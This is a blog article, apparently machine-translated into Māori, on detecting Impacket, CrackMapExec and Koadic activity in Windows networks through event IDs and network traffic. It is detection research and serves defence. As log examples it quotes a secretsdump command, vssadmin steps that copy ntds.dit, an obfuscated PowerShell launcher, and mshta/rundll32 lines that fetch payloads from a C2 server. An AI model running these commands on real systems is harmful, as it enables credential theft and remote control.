ProHoster > Блог > Whakahaerenga > Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker

Kei te tipu haere te maha o nga whakaeke i roto i nga umanga umanga ia tau: hei tauira i te tau 2017, 13% atu nga aitua ahurei i tuhia i te tau 2016, a i te mutunga o te 2018 - 27% atu nga aituaatu i te wa o mua. Tae atu ki era ko te taputapu mahi matua ko te punaha whakahaere Windows. I te tau 2017-2018, ko te APT Dragonfly, APT28, APT MuddyWater i whakaekea nga whakahaere a te kawanatanga me nga hoia i Uropi, Amerika Te Tai Tokerau me Saudi Arabia. A e toru nga taputapu i whakamahia e matou mo tenei - Impacket, MaherMapExec и Koadic. Kei te tuwhera a raatau waehere puna me te waatea ki GitHub.

He mea tika kia mohio ko enei taputapu kaore i te whakamahia mo te whakauru tuatahi, engari ki te whakawhanake i te whakaeke i roto i te hanganga. Ka whakamahia e nga kaiwhaiwhai i nga waahanga rereke o te whakaeke i muri i te urunga o te waahi. Ko tenei, he uaua ki te kitea me te maha noa ma te awhina o te hangarau te tautuhi i nga tohu o te taupatupatu i roto i te hokohoko whatunga taputapu ranei e taea ai ka kitea nga mahi kaha a te kaitukino i muri i tana urunga ki roto i te hanganga. Ka whakaratohia e nga taputapu nga momo mahi, mai i te whakawhiti i nga konae ki te taunekeneke me te rehita me te whakahaere i nga whakahau i runga i te miihini mamao. I whakahaerehia e matou he rangahau mo enei taputapu hei whakatau i o raatau mahi whatunga.

He aha ta maatau e mahi:

  • Kia mohio ki te mahi o nga taputapu hacking. Rapua he aha te hunga whakaeke me whakamahi he aha nga hangarau ka taea e ratou te whakamahi.
  • Kimihia nga mea kaore i kitea e nga taputapu haumaru korero i nga waahanga tuatahi o te whakaeke. Ka pekehia pea te waahi tirotiro, na te mea he kaikoeke o roto te kaikohuru, na te mea ranei kei te whakamahi te kaitawhai i tetahi kohao i roto i nga hanganga kaore i mohiotia i mua. Ka taea te whakahoki mai i te mekameka katoa o ana mahi, na reira te hiahia ki te kite i etahi atu nekehanga.
  • Whakamutua nga korero teka mai i nga taputapu rapu whakauru. Kaua tatou e wareware ki te kitea etahi mahi i runga i te tirotiro anake, he maha nga hapa ka taea. I te nuinga o te wa i roto i te hanganga he maha nga huarahi, kaore e taea te rereke mai i nga mea tika i te titiro tuatahi, ki te tiki korero.

He aha ta enei taputapu e hoatu ai ki te hunga whakaeke? Mena ko Impacket tenei, ka whiwhi nga kaiwhaiwhai i te whare pukapuka nui o nga waahanga ka taea te whakamahi i nga waahanga rereke o te whakaeke ka whai ake i muri i te pakaru o te waahi. He maha nga taputapu e whakamahi ana i nga waahanga Impacket i roto - hei tauira, Metasploit. He dcomexec me te wmiexec mo te mahi whakahau mamao, secretsdump mo te tango kaute mai i te mahara ka taapirihia mai i Impacket. Ko te mutunga mai, ko te kimi tika i nga mahi o taua whare pukapuka ka tino kitea nga pärönaki.

Ehara i te mea pohehe i tuhia e nga kaihanga "Powered by Impacket" mo CrackMapExec (he CME noa ranei). I tua atu, kua rite te mahi a CME mo nga ahuatanga rongonui: Mimikatz mo te whiwhi kupuhipa me o raatau tohu, te whakatinanatanga o te Meterpreter, te kaihoko Empire ranei mo te whakamate mamao, me te Bloodhound i runga i te kaipuke.

Ko te taputapu tuatoru i whiriwhiria e matou ko Koadic. He mea tata nei, i whakaatuhia ki te huihuinga hacker o te ao DEFCON 25 i te tau 2017, ka tohuhia e te huarahi kore-paerewa: ka mahi ma te HTTP, Java Script me Microsoft Visual Basic Script (VBS). Ko tenei huarahi e kiia ana ko te noho ki waho o te whenua: ka whakamahia e te taputapu he huinga whakawhirinakitanga me nga whare pukapuka i hangaia ki Windows. Ka karangahia e nga kaihanga ko COM Command & Control, C3 ranei.

KAUPAPA

He tino whanui te mahi a Impacket, mai i te tirotiro i roto i te AD me te kohi raraunga mai i nga tūmau MS SQL o roto, ki nga tikanga mo te whiwhi tohu tohu: he whakaeke relay SMB tenei, me te whiwhi i te konae ntds.dit kei roto nga tohu o nga kupuhipa kaiwhakamahi mai i tetahi kaiwhakahaere rohe. Ka mahia ano e Impacket nga whakahau ma te whakamahi i nga tikanga rereke e wha: WMI, Ratonga Whakahaere Whakahōtaka Windows, DCOM, me te SMB, me te whai tohu mo te mahi pera.

Putunga ngaro

Kia titiro tatou ki secretsdump. He kōwae tenei ka taea te aro ki nga miihini kaiwhakamahi me nga kaiwhakahaere rohe. Ka taea te whakamahi ki te tiki kape o nga waahi mahara LSA, SAM, SECURITY, NTDS.dit, kia kitea i nga waahanga rereke o te whakaeke. Ko te mahi tuatahi i roto i te mahinga o te kōwae ko te whakamotuhēhē mā te SMB, e hiahia ana ki te kupuhipa a te kaiwhakamahi, ki tana hash ranei hei kawe aunoa i te whakaeke Pass the Hash. Ka puta mai he tono ki te whakatuwhera i te uru ki te Kaiwhakahaere Mana Whakahaere (SCM) me te uru atu ki te rehitatanga ma te kawa winreg, ma te whakamahi ka taea e te kaiwhaiwhai te rapu i nga raraunga o nga peka o te paanga me te whiwhi hua ma te SMB.

Kei te Fig. 1 ka kite tatou me pehea te wa e whakamahi ana i te kawa winreg, ka uru mai te uru ma te whakamahi i te taviri rehita me te LSA. Hei mahi i tenei, whakamahia te whakahau DCERPC me te opcode 15 - OpenKey.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 1. Te whakatuwhera i te taviri rehita ma te whakamahi i te kawa winreg

I muri mai, ka whiwhi te uru ki te ki, ka tiakina nga uara me te whakahau SaveKey me te opcode 20. Ka mahia e Impacket tenei i roto i te huarahi tino motuhake. Ka tiakina e ia nga uara ki tetahi konae ko tona ingoa he aho o nga tohu matapōkere 8 kua apitihia ki te .tmp. I tua atu, ko te tukunga ake o tenei konae ka puta ma te SMB mai i te whaiaronga System32 (Fig. 2).

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 2. Te kaupapa mo te tiki i te taviri rehita mai i te miihini mamao

Ka kitea tera mahi i runga i te whatunga ka kitea e nga patai ki etahi peka rehita ma te whakamahi i te kawa winreg, nga ingoa motuhake, nga whakahau me o raatau ota.

Ka waiho e tenei kōwae he tohu ki te rangitaki takahanga Windows, kia ngawari ki te kite. Hei tauira, na te mahi i te whakahau

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

I roto i te rangitaki Windows Server 2016 ka kite tatou i nga raupapa kaupapa e whai ake nei:

1. 4624 - Takiuru mamao.
2. 5145 - te tirotiro motika uru ki te ratonga mamao winreg.
3. 5145 - te tirotiro i nga mana uru ki te konae kei te raarangi System32. Kei te kōnae te ingoa matapōkere kua whakahuatia ake nei.
4. 4688 - te hanga i te tukanga cmd.exe ka whakarewa vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - te hanga tukanga me te whakahau:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - te hanga tukanga me te whakahau:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - te hanga tukanga me te whakahau:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Pērā i te maha o nga taputapu i muri i te mahi, he waahanga a Impacket mo te whakahaere i nga whakahau. Ka arotahi tatou ki te smbexec, e whakarato ana i te anga whakahau tauwhitiwhiti i runga i te miihini mamao. Me whakamotuhēhē anō tēnei kōwae mā te SMB, mā te kupuhipa me te hash kupuhipa rānei. Kei te Fig. I te Whakaahua 3 ka kite tatou i tetahi tauira o te mahi o taua taputapu, i tenei keehi ko te papatohu kaiwhakahaere rohe.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 3. Papatohu smbexec tauwhitiwhiti

Ko te taahiraa tuatahi o te smbexec i muri i te whakamotuhēhēnga ko te whakatuwhera i te SCM me te OpenSCManagerW whakahau (15). He mea rongonui te patai: ko DUMMY te maraMihiniName.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 4. Tono ki te whakatuwhera i te Kaiwhakahaere Mana Ratonga

I muri mai, ka hangaia te ratonga ma te whakamahi i te whakahau CreateServiceW (12). I roto i te take o smbexec, ka kite tatou i te arorau hanga whakahau i nga wa katoa. Kei te Fig. Ko te 5 kakariki e tohu ana i nga tawhā whakahau e kore e taea te huri, ko te kowhai he tohu ka taea e te kaitawhai te huri. He ngawari ki te kite ka taea te whakarereke i te ingoa o te konae whakahaere, tona raarangi me te konae whakaputa, engari ko te toenga he uaua ake te whakarereke me te kore e whakararuraru i te arorau o te kōwae Impacket.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 5. Tono ki te hanga ratonga ma te whakamahi i te Kaiwhakahaere Mana Ratonga

Ka waiho ano e Smbexec etahi tohu i roto i te raarangi takahanga Windows. I roto i te takiuru Windows Server 2016 mo ​​te anga whakahau tauwhitiwhiti me te whakahau ipconfig, ka kite tatou i nga raupapa kaupapa e whai ake nei:

1. 4697 — te whakaurunga o te ratonga i runga i te miihini o te patunga:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - te hanga i te tukanga cmd.exe me nga tohenga mai i te tohu 1.
3. 5145 - te taki motika uru ki te __output file i te raarangi C$.
4. 4697 - te whakaurunga o te ratonga ki runga i te miihini o te patunga.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - te hanga i te tukanga cmd.exe me nga tohenga mai i te tohu 4.
6. 5145 - te taki motika uru ki te __output file i te raarangi C$.

Ko te Impacket te turanga mo te whanaketanga o nga taputapu whakaeke. Kei te tautoko tata ki nga kawa katoa i roto i te hanganga Windows me te wa ano kei a ia ano nga ahuatanga. Anei nga tono winreg motuhake, me te whakamahi i te SCM API me te hanganga whakahau tohu, me te whakatakotoranga ingoa konae, me te tiri SMB SYSTEM32.

CRACKMAPEXEC

Ko te taputapu CME he mea hanga ki te whakaaunoa i aua mahi maataki me mahi e te kaitukino ki te ahu whakamua i roto i te whatunga. Ka taea e koe te mahi tahi me te kaihoko Empire rongonui me te Meterpreter. Hei mahi huna i nga whakahau, ka taea e CME te whakapouri i a raatau. Ma te whakamahi i te Bloodhound (he taputapu tirotiro motuhake), ka taea e te kaiwhaiwhai te whakaaunoa i te rapu mo tetahi huihuinga kaiwhakahaere rohe kaha.

Bloodhound

Ko te Bloodhound, he taputapu tuuturu, ka taea te tirotiro i roto i te whatunga. Ka kohia e ia nga raraunga mo nga kaiwhakamahi, miihini, roopu, huihuinga ka tukuna hei tuhinga PowerShell, konae rua ranei. Ka whakamahia nga kawa LDAP, SMB ranei hei kohikohi korero. Ko te kōwae whakauru CME ka taea e Bloodhound te tango ki te miihini a te kaipatu, te whakahaere me te whiwhi i nga raraunga kua kohia i muri i te mahi, na reira ka mahi aunoa i nga mahi i roto i te punaha me te kore e kitea. Ko te anga whakairoiro Bloodhound e whakaatu ana i nga raraunga kua kohia i roto i te ahua o nga kauwhata, e taea ai e koe te kimi i te huarahi poto rawa mai i te miihini a te kaitukino ki te kaiwhakahaere rohe.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 6. Atanga Bloodhound

Hei whakahaere i runga i te miihini o te patunga, ka hangaia e te kōwae he mahi ma te whakamahi i te ATSVC me te SMB. Ko te ATSVC he atanga mo te mahi me te Kaihōtaka Mahi Windows. Ka whakamahi a CME i tana mahi NetrJobAdd(1) hei hanga mahi i runga i te whatunga. Ko tetahi tauira o nga mea ka tukuna e te waahanga CME e whakaatuhia ana i te Fig. 7: He waea whakahau cmd.exe tenei me te waehere huna i te ahua o nga tohenga ki te whakatakotoranga XML.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
Fig.7. Te hanga mahi ma te CME

I muri i te tukunga o te mahi mo te whakamatenga, ka tiimata te miihini a te patunga i a Bloodhound ake, a ka kitea tenei i roto i nga waka. Ko te waahanga e tohuhia ana e nga patai LDAP kia whiwhi roopu paerewa, he rarangi o nga miihini me nga kaiwhakamahi katoa i roto i te rohe, me te whiwhi korero mo nga waahi kaiwhakamahi kaha ma te tono SRVSVC NetSessEnum.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 8. Te whiwhi rarangi o nga huihuinga kaha ma te SMB

I tua atu, ko te whakarewatanga o te Bloodhound ki runga i te miihini a te tangata kua paopaohia me te tirotiro kua whakahohea ka haere tahi me tetahi huihuinga me te ID 4688 (te hanga tukanga) me te ingoa tukanga. «C:WindowsSystem32cmd.exe». Ko te mea rongonui ko nga tohenga rarangi whakahau:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

He tino pai te waahanga enum_avproducts mai i te tirohanga o te mahi me te whakatinanatanga. Ka taea e WMI te whakamahi i te reo uiui WQL ki te tiki raraunga mai i nga momo ahanoa Windows, ko te tikanga tenei e whakamahia ana e tenei waahanga CME. Ka whakaputa patai ki nga karaehe AntiSpywareProduct me AntiМirusProduct mo nga taputapu whakamarumaru kua whakauruhia ki runga i te miihini o te patunga. Kia whiwhi ai i nga raraunga e tika ana, ka hono te kōwae ki te mokowāingoa rootSecurityCenter2, ka puta he uiui WQL ka whiwhi whakautu. Kei te Fig. Ko te Whakaahua 9 e whakaatu ana i nga korero o aua tono me nga whakautu. I roto i ta maatau tauira, i kitea a Windows Defender.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 9. Mahi whatunga o te kōwae enum_avproducts

I te nuinga o nga wa, ka monokia te arotake WMI (Trace WMI-Activity), kei roto i ana huihuinga ka kitea e koe nga korero whai hua mo nga patai WQL. Engari ki te whakahohea, na mena ka whakahaerehia te tuhinga enum_avproducts, ka tiakina he huihuinga me te ID 11. Kei roto te ingoa o te kaiwhakamahi nana i tuku te tono me te ingoa i roto i te mokowā ingoa rootSecurityCenter2.

Kei ia kōwae CME ana ake mahi toi, ahakoa he uiui WQL motuhake, he hanga ranei i tetahi momo mahi i roto i te raarangi mahi me te whakapouri me te mahi a Bloodhound i roto i te LDAP me te SMB.

KOADIC

Ko tetahi ahuatanga motuhake o Koadic ko te whakamahi i nga kaiwhakamaori JavaScript me VBScript i hangaia ki Windows. I roto i tenei tikanga, ka whai i te oranga o te whenua - ara, karekau he herenga o waho me te whakamahi taputapu Windows paerewa. He taputapu tenei mo te Whakahau me te Whakahaere (CnC), mai i muri i te mate ka whakauruhia he "whakato" ki runga i te miihini, ka taea te whakahaere. Ko taua miihini, i roto i nga kupu Koadic, ka kiia he "zombie". Mena he iti rawa nga mana mo te mahi katoa i te taha o te patunga, kei a Koadic te kaha ki te whakaara i a raatau ma te whakamahi i nga tikanga Whakaaetanga Pūkete Kaiwhakamahi (UAC bypass).

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 10. Anga Koadic

Me timata te pärurenga ki te körero ki te tūmau Whakahau me te Mana. Ki te mahi i tenei, me whakapiri atu ia ki tetahi URI kua oti te whakarite me te tango i te tinana Koadic matua ma te whakamahi i tetahi o nga kaiwhakaari. Kei te Fig. Ko te ahua 11 e whakaatu ana i tetahi tauira mo te kaitoi mshta.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 11. Ka timata i tetahi huihuinga me te tūmau CnC

I runga i te taurangi whakautu WS, ka maarama ko te mahi ka puta ma te WScript.Shell, me nga taurangi STGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE kei roto nga korero matua mo nga tawhā o te waahi o naianei. Koinei te takirua tono-whakautu tuatahi i roto i te hononga HTTP me te tūmau CnC. Ko nga tono o muri mai e pa ana ki te mahi o nga waahanga e kiia nei (whakato). Ko nga kōwae Koadic katoa ka mahi anake me tetahi huihuinga kaha me CnC.

Mimikatz

Pērā i te mahi a CME me Bloodhound, ka mahi tahi a Koadic me Mimikatz hei kaupapa motuhake me te maha o nga huarahi ki te whakarewa. Kei raro nei he takirua tono-whakautu mo te tango i te implant Mimikatz.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 12. Whakawhiti Mimikatz ki Koadic

Ka taea e koe te kite i te whakarereketanga o te whakatakotoranga URI i roto i te tono. Kei roto i tenei wa he uara mo te taurangi csrf, kei a ia te kawenga mo te waahanga kua tohua. Kaua e aro ki tona ingoa; E mohio ana tatou he rereke te maarama ki te CSRF. Ko te whakautu ko te roopu matua o Koadic, i taapirihia te waehere e pa ana ki a Mimikatz. He tino nui, no reira me titiro ki nga kaupapa matua. Kei konei te whare pukapuka Mimikatz kua whakawaeheretia ki base64, he karaehe .NET raupapa ka werohia, me nga tautohetohe ki te whakarewa i te Mimikatz. Ko te hua o te mahi ka tukuna ki runga i te whatunga i roto i nga tuhinga maamaa.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 13. Te hua o te whakahaere Mimikatz i runga i te miihini mamao

Exec_cmd

Kei a Koadic ano nga waahanga ka taea te whakahaere i nga whakahau. I konei ka kite tatou i te tikanga whakatipuranga URI me nga taurangi taurangi me te csrf. I roto i te take o te kōwae exec_cmd, ka taapirihia te waehere ki te tinana e kaha ana ki te whakahaere i nga whakahau anga. Kei raro nei e whakaatuhia ana taua waehere kei roto i te whakautu HTTP o te tūmau CnC.

Me pehea te kite i nga whakaeke i runga i nga hanganga Windows: te ako i nga taputapu hacker
raihi. 14. Waehere whakauru exec_cmd

Ko te taurangi GAWTUUGCFI me te huanga WS taunga e hiahiatia ana mo te mahi waehere. Ma tana awhina, ka karangahia e te implant te anga, te tukatuka i nga peka e rua o te waehere - shell.exec me te hokinga mai o te awa raraunga putanga me te shell.run me te kore e hoki mai.

Ko te Koadic ehara i te taputapu angamaheni, engari kei a ia ano ona taonga e kitea ai i nga waka tika:

  • hanga motuhake o nga tono HTTP,
  • te whakamahi i te winHttpRequests API,
  • te hanga ahanoa WScript.Shell mā ActiveXObject,
  • tinana whakahaere nui.

Ko te hononga tuatahi i timatahia e te kaiwhakataki, na reira ka taea te kite i tana mahi ma nga kaupapa Windows. Mo te mshta, koinei te kaupapa 4688, e tohu ana i te hanga o tetahi tukanga me te huanga timatanga:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

I a Koadic e rere ana, ka kite koe i etahi atu kaupapa 4688 me nga huanga e tino tohu ana:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

kitenga

Ko te noho ki waho o te whenua kei te rongonui haere i waenga i nga tangata mahi kino. Ka whakamahia e ratou nga taputapu me nga tikanga i hangaia ki Windows mo o raatau hiahia. Kei te kite matou i nga taputapu rongonui a Koadic, CrackMapExec me Impacket e whai ana i tenei maataapono ka piki haere ki nga purongo APT. Kei te tipu haere hoki te maha o nga marau i runga i te GitHub mo enei taputapu, a kei te puta mai nga mea hou (kua tata ki te kotahi mano inaianei). Kei te rongonui haere te ahua na tona ngawari: kaore e hiahiatia e nga kaiwhaiwhai nga taputapu tuatoru; kei runga tonu ratou i nga miihini a nga patunga ka awhina i a raatau ki te karo i nga tikanga haumaru. Ka arotahi matou ki te ako i te whakawhitiwhiti korero whatunga: ko ia taputapu e whakaahuatia ana i runga ake ka waiho ona ake tohu i roto i nga hokohoko whatunga; Ko nga rangahau taipitopito mo ratou i taea e matou te ako i a maatau hua PT Whatunga Attack Discovery kitea ratou, i te mutunga ka awhina ki te tirotiro i nga mekameka katoa o nga aitua ipurangi e pa ana ki a raatau.

Kaitito:

  • Anton Tyurin, Tumuaki o te Tari Ratonga Tohunga, PT Tohunga Haumarutanga Center, Hangarau Pai
  • Egor Podmokov, tohunga, PT Tohunga Haumarutanga Center, Hangarau Pai

Source: will.com

Tāpiri i te kōrero